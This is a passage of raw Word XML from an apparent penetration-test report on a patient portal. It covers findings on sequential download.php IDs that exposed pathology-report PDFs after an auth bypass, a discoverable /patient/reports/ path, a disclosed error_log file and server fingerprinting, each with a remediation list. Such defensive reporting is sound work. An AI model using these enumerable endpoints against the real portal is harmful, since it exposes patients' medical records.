        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="2995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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2995930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: HTML links to download.php?id=1..3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="29819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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2981960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: report listing view.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Three confidential pathology-report PDFs were retrieved after the auth bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The HTML exposed download.php?id=1, id=2 and id=3. Each request returned HTTP 200 with application/pdf and the captured files were preserved as evidence. The assessment does not claim a standalone cross-patient IDOR because a separate legitimate-patient-to-other-patient authorization test was not performed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Bind each download to the authenticated patient/record owner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>authorize the object server-side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>use opaque identifiers or short-lived signed URLs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>log document access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>deny access by default</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>test horizontal authorization separately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Authenticated users must receive only records they are authorized to view; unauthorized report IDs must return a consistent denial.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-06 — Predictable/disclosed patient-report storage path</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CRITICALITY</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CVSS v3.1</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="DCFCE7"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15803D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>LOW</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3.1*</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CWE-200 / A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The portal exposed sequential numeric report identifiers and the parent directory disclosed a reports/ storage path. Direct browsing of /patient/reports/ returned HTTP 403, which is positive directory protection, but the path itself remained discoverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Predictable identifiers and disclosed storage locations reduce enumeration effort. The practical impact is limited by the observed 403 and should not be overstated as arbitrary file read.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The application exposes sequential object identifiers and a storage directory name. This is not treated as proof of arbitrary file read because direct browsing of /patient/reports/ returned 403.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="2471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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2471420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Related evidence: patient directory exposes storage/log metadata while direct reports directory is protected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sequential report identifiers and a disclosed storage path reduce discovery effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Direct browsing of /patient/reports/ returned HTTP 403, which is positive directory protection, but the path itself remained discoverable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use opaque identifiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>store files outside the web root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>authorize downloads against record ownership</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>return uniform responses for unknown/unauthorized IDs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sequential or guessed identifiers must not expose unauthorized objects; storage paths must not be directly browsable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-07 — Public disclosure of error-log filename/metadata</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CRITICALITY</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CVSS v3.1</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FEF3C7"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B45309"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>MEDIUM</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5.3*</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CWE-200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The /patient/ directory listing disclosed an error_log filename and metadata, including an approximately 243 KB file size in the captured listing. The evidence does not establish that the log contents were directly readable, so no log-content disclosure is claimed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Knowing a log exists and its filename can help an attacker target error-handling artifacts. The final severity depends on whether the file is readable and whether it contains secrets or stack traces.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="30029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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="3002915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: error_log filename and metadata in directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Directory indexing reveals an application error log filename and metadata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The evidence does not establish that the log contents were directly readable, so no log-content disclosure is claimed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Keep logs outside the web root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>deny direct access to *.log and error_log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>rotate and protect logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>monitor unusual requests for log filenames.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Direct requests for error_log and log extensions must be denied; logs must reside outside the public document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-08 — Server/hosting fingerprint disclosure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CRITICALITY</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CVSS v3.1</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="DCFCE7"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15803D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>LOW</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3.1*</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kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CWE-200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The web and hosting stack disclosed service and platform fingerprints, including LiteSpeed and reverse-proxy/openresty behavior. Service enumeration also identified shared-hosting management and mail services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Fingerprinting is generally defense-in-depth. It becomes materially important when a specific exposed component is vulnerable, but this assessment did not establish such an exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Observed fingerprints include LiteSpeed, HAProxy/openresty behavior and shared-hosting service banners. Direct-to-IP HTTP behavior differed from hostname behavior, which is consistent with host-based routing/SNI and is not itself classified as a vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Web and hosting-layer fingerprints are externally observable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Service enumeration also identified shared-hosting management and mail services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Minimize unnecessary version banners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>keep reverse-proxy and origin software patched</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>reduce management exposure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>verify that shared-hosting services are intentionally reachable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Unnecessary version details should be minimized and exposed services should remain patched and intentionally reachable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Technical Foundations — What the Evidence Means</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
